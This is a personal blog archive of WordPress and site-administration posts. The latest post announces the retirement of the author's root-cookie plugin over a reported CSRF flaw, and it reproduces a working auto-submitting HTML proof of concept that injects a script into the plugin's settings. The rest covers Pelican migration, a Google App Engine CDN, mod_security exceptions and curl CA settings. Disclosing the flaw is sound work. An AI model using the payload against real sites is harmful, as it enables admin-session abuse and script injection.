LINICKX.com

Goodbye root-cookie

Nick Bettison — Sat, 14 Dec 2024 15:59:00 +0000

TLDR: 🔥🔥🔥 If you still use root-cookie, please delete it from your WordPress/Website 🔥🔥🔥🔥

Today I have requested that the Plugins team over at WordPress.org org delete my root-cookie plugin. I started it back in 2008 for WP 2.6, probably before if you dig into the SVN history, back when things were very different.

Back in the early days of WordPress, it was a "sub directory", i.e. you setup your site with a home page, and then WordPress (blog) was a below that. The problem root-cookie was designed to solve, is that there was no way of accessing the WordPress authentication cookie outside the WordPress folder, so if you wanted to something as simple as change a banner, or theme based on being logged in, you could't. root-cookie was very simple, it hooked into WordPress's authentication functions and stripped the folder out of the cookie, and assigned it to the "root" of the domain, then from your custom code you could read it and do whatever.

I really, really cannot remember what the admin page did or looked like, there's probably some screenshots around here but apparently it contains a Cross Site Request Forgery (CSRF) vulnerability, the steps (apparently, I've not tested) to reproduce are:

Make a logged in admin click a link with the following HTML (replace the domain)

<!DOCTYPE html>
<html>
<body onload="document.forms[0].submit()">
<form action="http://{domain}/wp-admin/options-general.php?page=root-cookie" method="POST">
<input type="hidden" name="rootcookie_submit_hidden" value='Y' />
<input type="hidden" name="rootcookie_subdomain_manual" value='&"><script>alert(1)</script>' />
</form>
</body>
</html>

REF: https://patchstack.com/

👉🏻 Given that I have not maintained this plugin for over 13 years, I do NOT intend to publish an update and have requested the plugin be deleted.

From: Nick
To: plugins wordpress.org
Date: 14 Dec 2024, 15:47
Subject: Please Delete "root-cookie"
Body:

Hello, Please delete https://wordpress.org/plugins/root-cookie/

The plugin has not been maintained in 13years, apparently recently it was discovered to contain a CSRF vulnerability, I do not intend to fix it therefore it would be safer for the community if the plugin is removed from wordpress.org.

Stats show only 11 downloads per week, I don't suppose the plugin is needed anymore, the first version was released in 2008 for WP2.6, I expect a lot has changed since then :)

Many Thanks in advance for your support.
Kind Regards,
Nick

Good bye WordPress, Hello Pelican !

Nick Bettison — Fri, 13 Feb 2015 12:05:00 +0000

After 10 happy years as a WordPress user, yesterday I switched my site over to pelican.

WordPress is awesome I'd recommend it to anyone, however over the last year I've become increasing frustrated with my sites stability; I've been pretty pleased with the average response time but it wouldn't take much to exhaust my cloud servers CPU. (I've tried pretty much every caching technique and couldn't find a perfect fix)

For anyone else that is embarking on this transition and having issues with pelican-import, I advise opening your posts.xml in Vi scroll through and look for any dodgey looking characters and remove them.

Making my new pelican site look "exactly" like my old site has been a labour of love so I have published some of my fixes online.

FEED URLS

In WordPress I had pretty URLs for Feeds like /feed, /feed/atom and /tag/security/feed. I found that feeds were limited to files in Pelican and did not support a nested structure. To fix this I have proposed a pull-request on github, I guess we'll see if it gets accepted.

URL Rewriting

This Pelican is a bit of an experiment to ease regression I want to leave my WordPress config completely untouched, therefore I have migrated from Apache to Nginx. I've not used nginx before, so it's been a bit of a learning curve if you're having problems with rewriting maybe my config can help?

Theme

The pelican LINICKX theme is now based on bootstrap.

Pelican Config

Tying it all together, nginx, pelican, etc takes a little effort... example pelicanconf.py and publishconf.py are on github.

To Do

There's still loads for me to fix, I've replaced all teh [gallery] tags but I know there's plenty of [caption] tags to remove.
I haven't yet worked out how I'm going to handle image resize/upload in a neat and tidy way, in fact my whole write & publish workflow needs a bit of thought. BUT this first pelican post, written in atom has gone well, so only time will tell!

Example wordpress_logged_in for root-cookie

nick — Wed, 24 Jul 2013 21:36:00 +0100

https://gist.github.com/linickx/6074260

Using Google as a FREE origin pull CDN

nick — Wed, 08 May 2013 19:00:00 +0100

There are bucket load of posts on how to use google application engine (GAE) as a CDN but many of them direct you to hosting static content on a google server. For me that approach isn't practical, every time I did a WordPress update or plugin upgrade I would have to push an update to GAE... annoying!

Origin-Pull is the future then, basically the server acting as a CDN pulls a copy of the original, caches it and serves that to clients. Updates on the main site are easy, just wait for the CDN to age out it's cache or if you are impatient manually purge.

Over the weekend I stumpbled upon SymPullCDN a GAE app, it's a bit out of date so I've pushed a newer version to github. I've made two changes, firstly updated to python2.7 (as per google's recommendation) and secondly I've added a cron job to keep your GAE app snappy :)

Setting up your own copy is simple, start by signing up for GAE and create a new "application", mine's called mygaecdn...

Next get a copy of the Google App Engine SDK for Python also known as GoogleAppEngineLauncher... Install it :)

Once it's running, create a new application... give it the same name as the app you created on google.

Take a note of the directory in which the application is being created, mine is Users/nick/Documents/GoogleAppEngine/mygaecdn

Next download this zip file which has the updated SymPullCDN files.

Delete everything from your Users/nick/Documents/GoogleAppEngine/mygaecdn and place in there the contents of SymPullCDN-master.zip

Open app.yaml in a text-editor and edit line 1 to replace *replace*me* with your application name, e.g.:

application: mygaecdn

Next open main.py in a text-editor and edit line 21 and replace http://replace*me/ with your website, e.g.:

origin = "https://www.linickx.com/"

Make sure you save both files and you are done!

Now, test locally in the GoogleAppEngineLauncher app before deploying to google. Click the green "play" and a GAE application will run on your local machine; from the screenshot above you can see mine is listening on "port 10080", so I can open a web browser to http://localhost:10080 - all things being equal you will see a copy of your website :)

If that works you're ready to deploy.... hit the blue "deploy" button to push you app up to google. When that's finished you should be able to visit mygaecdn.appspot.com... obviously yours isn't called mygaecdn!

Once the deploy is finished you have a GAE ready and willing to serve cached copies of your site.

What you do next will depend on your website. Me, I use WordPress and wp-super-cache, so I can simply enable the CDN feature in that, e.g.:

You might have to install something, or change some URLs, whatever you do, just remember to only change links to static content such as CSS, JS or IMG - anything dynamic is likely to end in a world of pain.

FOOTNOTE: The term CDN is used loosely in this blog post, GAE is more of a content off-load, IMHO a CDN should server you geographically-local content but in all my tests on webpagetest showed all my content coming from Google-USA, not that is really a problem as their servers are still rocket-quick :cool:

mod_security and WordPress with Commands in Permalinks (urls)

nick — Wed, 27 Jun 2012 08:34:00 +0100

For a long while now, one of my oldest posts (nagios ping tool) returned a 403 error and I couldn't work out why... a recent post about curl also fell foul of the same issue so I've been forced to work out why ;)

The main challenge that I faced was that I could not find any errors in my logs, apache's error_logs were empty, varnish is not catching the error page and my mod_security debuglog didn't show anything. Now there is clearly a 2do here, I need to look into my logging issues because the issue was mod_security!

modsecurity_crs_40_generic_attacks as a list of system rules which will deny access to commands, on my system ping & traceroute are indeed commands! Looking thru _crs_40 I can see that rule ID 950907 blocks curl, therefore I can create a simple location match to permit access to that page.

<LocationMatch "^/3659/my-lifestream-php-curl-ca-certificate-issues">
    SecRuleRemoveById 950907
</LocationMatch>

Traceroute and Ping are IDs 958837 & 958893 respectively. Going forward I could simply remove those IDs globally, but to be honest I don't want to, I feel comfort with the restriction they begin... I will just have to be more careful with the titles I use on pages.

Test Facebook post from linickx.com (WordPress)

nick — Wed, 13 Jun 2012 14:58:00 +0100

A while back facebook disabled RSS importing of my linickx.com posts which has resulted in my facebook timeline being very empty.

It's taken them a while, but facebook appear to have got with the program and released an official wordpress plugin... nice work guys!

This is a test post to see if I have it setup correctly... assuming it works my friends will starting seeing a bit more linickx'y things :)

My Lifestream - PHP, Curl, CA & Certificate Issues

nick — Fri, 08 Jun 2012 13:56:00 +0100

I use my own lifestream plugin to feed my blog page with activity from other sites.

A (long) while ago HTTPS feeds stopped working, basically due to certificate trust issues.

Now the lifestream plugin uses WordPress built in functions to perform HTTP requests.... and this was not something I wanted to change. It's taken a bit of exploring to work out why the default configuration did not work... and then find the best way to patch it.

Eventually I found out that you can set the PHP_CURL CA Path in php.ini using the curl.cainfo directive. On CentOS the "well known" CAs are stored in /etc/pki/tls/certs/ therefore the fix was quite simple, add the following to /etc/php.ini

curl.cainfo = /etc/pki/tls/certs/

Job done! Now HTTPS only site (like github) lifestream nicely!

Making your WordPress.org/extend/plugin pages look cool!

nick — Fri, 09 Mar 2012 08:38:00 +0000

Whilst browsing what is on offer at wordpress.org/extend I noticed that the plugins by automattic had fancy banners (e.g. jetpack & buddypress)... I wanted in!

Since the text on these pages is generated from the readme.txt in a given plugin's repo I figured I'd take a look there and see if the automattic guys were doing anything different... oh yeah, there were!

These repo's had a "assets" folder in the root, and in there was a banner-772x250.png. Simply by generating my own banner (772px wide by 250px high), creating an assets folder in each of my repos and committing did the trick - so secret sauce required! (NOTE:You have to wait a while for wp.org to update, I waited overnight)

I think these are looking rather groovy :)

is_blog

nick — Tue, 24 Jan 2012 16:42:00 +0000

Since moving to a static front page I've noticed google is indexing /blog rather than individual posts.... this little addition to my header.php should fix it!

You may notice that WordPress doesn't appear to be an is_blog function which would do the same thing.

root-cookie 1.6, two years in the making?

nick — Thu, 22 Dec 2011 22:02:00 +0000

No taking two years to release an update is not good, but in my defence root-cookie is so simple that there are very few issues and complaints ;)

Actually a two year wait isn't strictly true, those watching the dev log would have seen I've pushed the odd update here and there.

So what prompts this release, well I've noticed that in WP3.3 that the cookie functions have changed, so to ensure future compatibility (and minimal issues for me) I have updated this plugin to be aligned to the core source.

The usual blurb...

ChangeLog

Contextual Help
Bug fix "undefined method WP_Error::get_items"
Logout Enhancement
WP 3.3 Compatability
Donation Link (it's good for your karma)